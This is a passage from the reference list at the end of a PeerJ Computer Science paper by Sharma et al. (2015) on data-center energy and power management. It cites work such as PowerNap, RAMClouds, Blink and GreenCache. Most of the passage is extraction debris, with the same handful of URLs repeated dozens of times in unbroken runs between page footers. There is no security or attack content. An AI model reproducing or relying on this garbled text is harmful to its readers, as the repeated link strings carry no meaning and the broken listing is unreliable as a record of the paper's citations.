Berkeley: USENIX. Meisner D, Gold B, Wenisch T. 2009. PowerNap: eliminating server idle power. In: Proceedings of the conference on architectural support for programming languages and operating systems. New York: ACM, 205–216. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 48/50 https://peerj.com/computer-science/ http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072 http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://dx.doi.org/10.7717/peerj-cs.34 Miller R. 2008. Microsoft to use solar panels in new data center. Data center knowledge. Available at http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new- data-center/. Moore J, Chase J, Ranganathan P. 2006. Weatherman: automated, online, and predictive thermal mapping and management for data centers. In: Proceedings of the international conference on autonomic computing. Berkeley: USENIX, 155–164. Moore J, Chase J, Ranganathan P, Sharma R. 2005. Making scheduling “cool”: temperature-aware resource assignment in data centers. In: Proceedings of the USENIX annual technical conference. Berkeley: USENIX, 61–75. Nah F. 2004. A study on tolerable waiting time: how long are web users willing to wait? Behaviour and Information Technology 23(3):153–163 DOI 10.1080/01449290410001669914. Ousterhout J, Agarwal P, Erickson D, Kozyrakis C, Leverich J, Mazieres D, Mitra S, Narayanan A, Parulkar G, Rosenblum M, Rumble S, Stratmann E, Stutsman R. 2009. The case for RAMClouds: scalable high-performance storage entirely in DRAM. ACM SIGOPS Operating Systems Review 43(5):92–105 DOI 10.1145/1713254.1713276. Pelley S, Meisner D, Zandevakili P, Wenisch T, Underwood J. 2010. Power routing: dynamic power provisioning in the data center. In: Proceedings of the conference on architectural support for programming languages and operating systems. New York: ACM, 231–242. Pinheiro E, Bianchini R. 2004. Energy conservation techniques for disk array-based servers. In: Proceedings of the international conference on supercomputing. Piscataway: IEEE, 68–78. Pinheiro E, Bianchini R, Carrera EV, Heath T. 2001. Load balancing and unbalancing for power and performance in cluster-based systems. In: Workshop on compilers and operating systems for low power. Available at http://www2.ic.uff.br/∼julius/stre/pinheiro01load.pdf. Qureshi A, Weber R, Balakrishnan H, Guttag J, Maggs B. 2009. Cutting the electric bill for internet-scale systems. In: Proceedings of the SIGCOMM conference. New York: ACM, 123–134. Ranganathan P, Leech P, Irwin D, Chase J. 2006. Ensemble-level power management for dense blade servers. In: Proceedings of the international symposium on computer architecture. New York, Piscataway: ACM/IEEE, 66–77. Rivoire S, Shah M, Ranganathan P, Kozyrakis C. 2008. JouleSort: a balanced energy-efficiency benchmark. In: Proceedings of the SIGMOD conference. New York: ACM, 365–376. Sen S, Rexford J, Towsley D. 1999. Proxy prefix caching for xiMultimedia streams. In: INFOCOM, vol. 3. Piscataway: IEEE, 1310–1319. Sharma N, Barker S, Irwin D, Shenoy P. 2011. Blink: managing server clusters on intermittent power. In: ASPLOS. New York: ACM, 185–198. Available at http://lass.cs.umass.edu/papers/pdf/ asplos2011.pdf. Sharma N, Krishnappa D, Irwin D, Zink M, Shenoy P. 2013. GreenCache: augmenting off-the-grid cellular towers with multimedia caches. In: MMSys. New York: ACM, 271–280. Stewart C, Shen K. 2009. Some joules are more precious than others: managing renewable energy in the datacenter. In: Proceedings of the workshop on power-aware computer systems. New York: ACM. Stoica I, Morris R, Karger D, Kaashoek F, Balakrishnan H. 2001. Chord: a scalable peer-to-peer lookup service for internet applications. In: Proceedings of the SIGCOMM conference. New York: ACM, 149–160. Stoke Solutions. 2011. Stoke solutions mobile data offload. Available at http://www.netmanias. com/ko/?m=view&id=cshare opt&no=5298. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 49/50 https://peerj.com/computer-science/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/2008/09/24/microsoft-uses-solar-panels-in-new-data-center/ http://dx.doi.org/10.1080/01449290410001669914 http://dx.doi.org/10.1145/1713254.1713276 http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://www2.ic.uff.br/~julius/stre/pinheiro01load.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf 